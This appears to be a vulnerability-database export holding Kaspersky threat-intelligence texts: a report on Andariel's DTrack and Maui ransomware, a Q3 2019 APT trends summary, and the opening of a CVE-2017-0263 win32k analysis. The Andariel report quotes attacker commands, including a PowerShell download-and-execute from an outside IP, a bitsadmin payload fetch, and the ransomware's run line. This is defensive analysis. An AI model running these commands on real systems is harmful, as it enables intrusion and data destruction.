a North Korean actor, we determined that approximately ten hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the target, preceded by 3proxy months earlier. This data point, along with others, should openly help solidify the attribution to the Korean-speaking APT Andariel, also known as Silent Chollima and Stonefly, with low to medium confidence.\n\n## Background\n\nWe observed the following timeline of detections from an initial target system:\n\n 1. 2020-12-25 Suspicious 3proxy tool\n 2. 2021-04-15 DTrack malware\n 3. 2021-04-15 Maui ransomware\n\n## DTrack malware\n\nMD5 | 739812e2ae1327a94e441719b885bd19 \n---|--- \nSHA1 | 102a6954a16e80de814bee7ae2b893f1fa196613 \nSHA256 | 6122c94cbfa11311bea7129ecd5aea6fae6c51d23228f7378b5f6b2398728f67 \nLink time | 2021-03-30 02:29:15 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 1.2 MB \nFile name | C:\\Windows\\Temp\\temp\\mvhost.exe \n \nOnce this malware is spawned, it executes an embedded shellcode, loading a final Windows in-memory payload. This malware is responsible for collecting victim information and sending it to the remote host. Its functionality is almost identical to previous DTrack modules. This malware collects information about the infected host via Windows commands. The in-memory payload executes the following Windows commands:\n \n \n \"C:\\Windows\\system32\\cmd.exe\" /c ipconfig /all > \"%Temp%\\temp\\res.ip\"\n \"C:\\Windows\\system32\\cmd.exe\" /c tasklist > \"%Temp%\\temp\\task.list\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netstat -naop tcp > \"%Temp%\\temp\\netstat.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c netsh interface show interface >\n \"%Temp%\\temp\\netsh.res\"\n \"C:\\Windows\\system32\\cmd.exe\" /c ping -n 1 8.8.8.8 > \"%Temp%\\temp\\ping.res\"\n\nIn addition, the malware collects browser history data, saving it to the browser.his file, just as the older variant did. Compared to the old version of DTrack, the new information-gathering module sends stolen information to a remote server over HTTP, and this variant copies stolen files to the remote host on the same network.\n\n## Maui ransomware\n\nThe Maui ransomware was detected ten hours after the DTrack variant on the same server.\n\nMD5 | ad4eababfe125110299e5a24be84472e \n---|--- \nSHA1 | 94db86c214f4ab401e84ad26bb0c9c246059daff \nSHA256 | a557a0c67b5baa7cf64bd4d42103d3b2852f67acf96b4c5f14992c1289b55eaa \nLink time | 2021-04-15 04:36:00 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 763.67 KB \nFile name | C:\\Windows\\Temp\\temp\\maui.exe \n \nMultiple run parameters exist for the Maui ransomware. In this incident, we observe the actors using "-t" and "\\- x" arguments, along with a specific drive path to encrypt:\n \n \n C:\\Windows\\Temp\\temp\\bin\\Maui.exe -t 8 -x E:\n\nIn this case, "-t 8" sets the ransomware thread count to eight, "-x" commands the malware to "self melt", and the "E:" value sets the path (the entire drive in this case) to be encrypted. The ransomware functionality is the same as described in the Stairwell report.\n\nThe malware created two key files to implement file encryption:\n\nRSA private key | C:\\Windows\\Temp\\temp\\bin\\Maui.evd \n---|--- \nRSA public key | C:\\Windows\\Temp\\temp\\bin\\Maui.key \n \n## Similar DTrack malware on different victims\n\nPivoting on the exfiltration information to the adjacent hosts, we discovered additional victims in India. One of these hosts was initially compromised in February 2021. In all likelihood, Andariel stole elevated credentials to deploy this malware within the target organization, but this speculation is based on paths and other artifacts, and we do not have any further details.\n\nMD5 | f2f787868a3064407d79173ac5fc0864 \n---|--- \nSHA1 | 1c4aa2cbe83546892c98508cad9da592089ef777 \nSHA256 | 92adc5ea29491d9245876ba0b2957393633c9998eb47b3ae1344c13a44cd59ae \nLink time | 2021-02-22 05:36:16 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nFile size | 848 KB \n \nThe primary objective of this malware is the same as in the case of the aforementioned victim in Japan, using different login credentials and local IP address to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144620/Andariel_Deploys_DTrack_and_Maui_Ransomware_01.png>)\n\n**_Windows commands to exfiltrate data_**\n\nFrom the same victim, we discovered additional DTrack malware (MD5 87e3fc08c01841999a8ad8fe25f12fe4) using different login credentials.\n\n## Additional DTrack module and initial infection method\n\nThe ["3Proxy" tool](<https://3proxy.ru/>), likely utilized by the threat actor, was compiled on 2020-09-09 and deployed to the victim on 2020-12-25. Based on this detection and compilation date, we expanded our research scope and discovered an additional DTrack module. This module was compiled 2020-09-16 14:16:21 and detected in early December 2020, having a similar timeline to the 3Proxy tool deployment.\n\nMD5 | cf236bf5b41d26967b1ce04ebbdb4041 \n---|--- \nSHA1 | feb79a5a2bdf0bcf0777ee51782dc50d2901bb91 \nSHA256 | 60425a4d5ee04c8ae09bfe28ca33bf9e76a43f69548b2704956d0875a0f25145 \nLink time | 2020-09-16 14:16:21 \nFile type | PE32 executable (GUI) Intel 80386, for MS Windows \nCompiler | VS2008 build 21022 \nFile size | 136 KB \nFile name | %appdata%\\microsoft\\mmc\\dwem.cert \n \nThis DTrack module is very similar to the EventTracKer module of DTrack, which was previously reported to our Threat Intelligence customers. In one victim system, we discovered that a well-known simple HTTP server, [HFS7](<https://www.rejetto.com/hfs/>), had deployed the malware above. After an unknown exploit was used on a vulnerable HFS server and "whoami" was executed, the Powershell command below was executed to fetch an additional Powershell script from the remote server:\n \n \n C:\\windows\\system32\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('hxxp://145.232.235[.]222/usr/users/mini.ps1')\n\nThe mini.ps1 script is responsible for downloading and executing the above DTrack malware via bitsadmin.exe:\n \n \n bitsadmin.exe /transfer myJob /download /priority high\n \"hxxp://145.232.235[.]222/usr/users/dwem.cert\" \"%appdata%\\microsoft\\mmc\\dwem.cert\"\n\nThe other victim operated a vulnerable Weblogic server. According to our telemetry, the actor compromised this server via the CVE-2017-10271 exploit. We saw Andariel abuse identical exploits and compromise WebLogic servers in mid-2019, and previously reported this activity to our Threat Intelligence customers. In this case, the exploited server executes the Powershell command to fetch the additional script. The fetched script is capable of downloading a Powershell script from the server we mentioned above (hxxp://145.232.235[.]222/usr/users/mini.ps1). Therefore, we can summarize that the actor abused vulnerable Internet-facing services to deploy their malware at least until the end of 2020.\n\n## Victims\n\nThe July 2022 CISA alert noted that the healthcare and public health sectors had been targeted with the Maui ransomware within the US. However, based on our research, we believe this operation does not target specific industries and that its reach is global. We can confirm that the Japanese housing company was targeted with the Maui ransomware on April 15, 2021. Also, victims from India, Vietnam, and Russia were infected within a similar timeframe by the same DTrack malware as used in the Japanese Maui incident: from the end of 2020 to early 2021.\n\nOur research suggests that the actor is rather opportunistic and could compromise any company around the world, regardless of their line of business, as long as it enjoys good financial standing. It is probable that the actor favors vulnerable Internet-exposed web services. Additionally, the [Andariel deployed ransomware](<https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/>) selectively to make financial profits.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/04144725/Andariel_Deploys_DTrack_and_Maui_Ransomware_02.png>)\n\n## Attribution\n\nAccording to the Kaspersky Threat Attribution Engine (KTAE), the DTrack malware from the victim contains a high degree of code similarity (84%) with previously known DTrack malware.\n\nAlso, we discovered that the DTrack malware (MD5 739812e2ae1327a94e441719b885bd19) employs the same shellcode loader as "Backdoor.Preft" malware (MD5 2f553cba839ca4dab201d3f8154bae2a), [published/reported by Symantec](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/stonefly-north-korea-espionage>) - note that Symantec recently described the Backdoor.Preft malware as "aka Dtrack, Valefor". Apart from the code similarity, the actor used 3Proxy tool (MD5 5bc4b606f4c0f8cd2e6787ae049bf5bb), and that tool was also previously employed by the Andariel/StoneFly/Silent Chollima group (MD5 95247511a611ba3d8581c7c6b8b1a38a). Symantec attributes StoneFly as the North Korean-linked actor behind the DarkSeoul incident.\n\n## Conclusions\n\nBased on the modus operandi of this attack, we conclude that the actor's TTPs behind the Maui ransomware incident is remarkably similar to past Andariel/Stonefly/Silent Chollima activity:\n\n * Using legitimate proxy and tunneling tools after initial infection or deploying them to maintain access, and using Powershell scripts and Bitsadmin to download additional malware;\n * Using exploits to target known but unpatched vulnerable public services, such as WebLogic and HFS;\n * Exclusively deploying DTrack, also known as Preft;\n * Dwell time within target networks can last for months prior to activity;\n * Deploying ransomware on a global scale, demonstrating ongoing financial motivations and scale of interest", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T10:00:46", "type": "securelist", "title": "Andariel deploys DTrack and Maui ransomware", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271"], "modified": "2022-08-09T10:00:46", "id": "SECURELIST:B61F1A3C7FBA17501CE779F4E076EB79", "href": "https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-10-16T11:39:54", "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contains many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, shows a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a.NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new.NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the.NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts,.NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over http for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in\n\nBangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChoper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.\n\n## **Middle East**\n\nOn August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, \"HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia\". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.\n\nTortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. However, we didn't find any compromised application that could suggest a supply chain attack.\n\n## **Southeast Asia and the Korean Peninsula**\n\nRecently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.\n\nWe recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nKaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak Lost in Translation included an interesting Python script \u2013sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "cvss3": {}, "published": "2019-10-16T10:00:26", "type": "securelist", "title": "APT trends report Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "seebug": [{"lastseen": "2017-11-19T11:57:45", "description": "May has been a busy month for vulnerabilities in the world's most popular desktop operating system. Hackers have made headlines with massive infections by WannaCry ransomware, which exploits an SMB security flaw and the ETERNALBLUE tool. Shortly prior, on May 9, Microsoft fixed CVE-2017-0263, which had made it possible for attackers to gain maximum system privileges on PCs running Windows 10, Windows 8.1, Windows 7, Windows Server 2008, Windows Server 2012, and Windows Server 2016.\r\n\r\nVulnerability CVE-2017-0263 had been used already in phishing messages. The emails contained an exploit that first entered the system by taking advantage of incorrect handling of EPS files by Microsoft Office (CVE-2017-0262) and then, once on the inside, leveraged CVE-2017-0263 to get full administrator rights. Two years ago we looked at a similar vulnerability in Windows, and here we will see how the new CVE-2017-0263 opens the way to \"pwning\" remote workstations and servers.\r\n\r\nIn a word, this is a use-after-free vulnerability (CWE-416)\u2014when context menu windows were closed and the memory occupied by the menu was freed up, the pointer to the freed-up memory was not zeroed out. As a result, the pointer could be reused.\r\n\r\nThe below discussion covers the process of window handling in the win32k.sys driver and how this process makes it possible to exploit the vulnerability.\r\n#### Context menus\r\nEvery Windows user is familiar with context menus. These are the menus that drop down when we right-click.\r\n\r\n\r\nThe appearance of this menu and how it is displayed are completely up to the developer of each application. WinAPI provides developers with the TrackPopupMenuEx function, which causes a context menu to appear with the specified parameters at the specified location on the screen.\r\nThe state of the context menu is stored in the kernel in the variable win32k!gMenuState, which is a win32k!tagMENUSTATE structure:\r\n```\r\n0: kd> dt win32k!tagMenuState\r\n +0x000 pGlobalPopupMenu : Ptr32 tagPOPUPMENU\r\n +0x004 flags : Int4B\r\n +0x008 ptMouseLast : tagPOINT\r\n +0x010 mnFocus : Int4B\r\n +0x014 cmdLast : Int4B\r\n +0x018 ptiMenuStateOwner : Ptr32 tagTHREADINFO\r\n +0x01c dwLockCount : Uint4B\r\n +0x020 pmnsPrev : Ptr32 tagMENUSTATE\r\n +0x024 ptButtonDown : tagPOINT\r\n +0x02c uButtonDownHitArea: Uint4B\r\n +0x030 uButtonDownIndex : Uint4B\r\n +0x034 vkButtonDown : Int4B\r\n +0x038 uDraggingHitArea : Uint4B\r\n +0x03c uDraggingIndex : Uint4B\r\n +0x040 uDraggingFlags : Uint4B\r\n +0x044 hdcWndAni : Ptr32 HDC__\r\n +0x048 dwAniStartTime : Uint4B\r\n +0x04c ixAni : Int4B\r\n +0x050 iyAni : Int4B\r\n +0x054 cxAni : Int4B\r\n +0x058 cyAni : Int4B\r\n +0x05c hbmAni : Ptr32 HBITMAP__\r\n +0x060 hdcAni : Ptr32 HDC__\r\n```\r\nNote that all of the call stacks and structures presented here are taken from Windows 7 x86. The 32-bit OS version is used for convenience: arguments for most functions are stored on the stack and there is no WoW64 layer, which during system calls switches to a 64-bit stack due to which 32-bit stack frames are lost when the call stack is printed. A full list of vulnerable operating systems is given on the Microsoft website.\r\n\r\nThe win32k!tagMENUSTATE structure stores, for example, such information as: the clicked region of the screen, number of the most recent menu command, and pointers to the windows that were clicked or selected for drag-and-drop. The list of context menu windows is stored in the first field, pGlobalPopupMenu, which is of the type win32k!tagPOPUPMENU:\r\n```\r\n0: kd> dt win32k!tagPopupMenu\r\n +0x000 flags : Int4B\r\n +0x004 spwndNotify : Ptr32 tagWND\r\n +0x008 spwndPopupMenu : Ptr32 tagWND\r\n +0x00c spwndNextPopup : Ptr32 tagWND\r\n +0x010 spwndPrevPopup : Ptr32 tagWND\r\n +0x014 spmenu : Ptr32 tagMENU\r\n +0x018 spmenuAlternate : Ptr32 tagMENU\r\n +0x01c spwndActivePopup : Ptr32 tagWND\r\n +0x020 ppopupmenuRoot : Ptr32 tagPOPUPMENU\r\n +0x024 ppmDelayedFree : Ptr32 tagPOPUPMENU\r\n +0x028 posSelectedItem : Uint4B\r\n +0x02c posDropped : Uint4B\r\n +0x030 ppmlockFree : Ptr32 tagPOPUPMENU\r\n```\r\nIn both structures we have highlighted the fields of interest, which will be used below to describe the exploitation process.\r\n\r\nThe variable win32k!gMenuState is initialized when a context menu is created, during the previously mentioned TrackPopupMenuEx function. Initialization occurs when win32k!xxxMNAllocMenuState is called:\r\n```\r\n1: kd> k\r\n # ChildEBP RetAddr \r\n00 95f29b38 81fe3ca6 win32k!xxxMNAllocMenuState+0x7c\r\n01 95f29ba0 81fe410f win32k!xxxTrackPopupMenuEx+0x27f\r\n02 95f29c14 82892db6 win32k!NtUserTrackPopupMenuEx+0xc3\r\n03 95f29c14 77666c74 nt!KiSystemServicePostCall\r\n04 0131fd58 7758480e ntdll!KiFastSystemCallRet\r\n05 0131fd5c 100015b3 user32!NtUserTrackPopupMenuEx+0xc\r\n06 0131fd84 7756c4b7 q_Main_Window_Class_wndproc (call TrackPopupMenuEx)\r\n```\r\nAnd when the context menu is no longer needed\u2014for example, the user selected a menu item or clicked outside of the menu\u2014the function win32k!xxxMNEndMenuState is called and frees up the state of the menu:\r\n```\r\n1: kd> k\r\n # ChildEBP RetAddr \r\n00 a0fb7ab0 82014f68 win32k!xxxMNEndMenuState\r\n01 a0fb7b20 81fe39f5 win32k!xxxRealMenuWindowProc+0xd46\r\n02 a0fb7b54 81f5c134 win32k!xxxMenuWindowProc+0xfd\r\n03 a0fb7b94 81f1bb74 win32k!xxxSendMessageTimeout+0x1ac\r\n04 a0fb7bbc 81f289c8 win32k!xxxWrapSendMessage+0x1c\r\n05 a0fb7bd8 81f5e149 win32k!NtUserfnNCDESTROY+0x27\r\n06 a0fb7c10 82892db6 win32k!NtUserMessageCall+0xcf\r\n07 a0fb7c10 77666c74 nt!KiSystemServicePostCall\r\n08 013cfd90 77564f21 ntdll!KiFastSystemCallRet\r\n09 013cfd94 77560908 user32!NtUserMessageCall+0xc\r\n0a 013cfdd0 77565552 user32!SendMessageWorker+0x546\r\n0b 013cfdf0 100014e4 user32!SendMessageW+0x7c\r\n0c 013cfe08 775630bc q_win_event_hook (call SendMessageW(MN_DODRAGDROP))\r\n```\r\n\r\nImportant here is that the gMenuState.pGlobalPopupMenu field is updated only during initialization in the xxxMNAllocMenuState function\u2014it is not zeroed out when the structure is destroyed.\r\n\r\n#### xxxMNEndMenuState function\r\nThis function is the star of our story. Its handful of lines harbor the vulnerability.\r\n\r\n\r\nxxxMNEndMenuState starts with deinitialization and freeing of information related to the context menu. 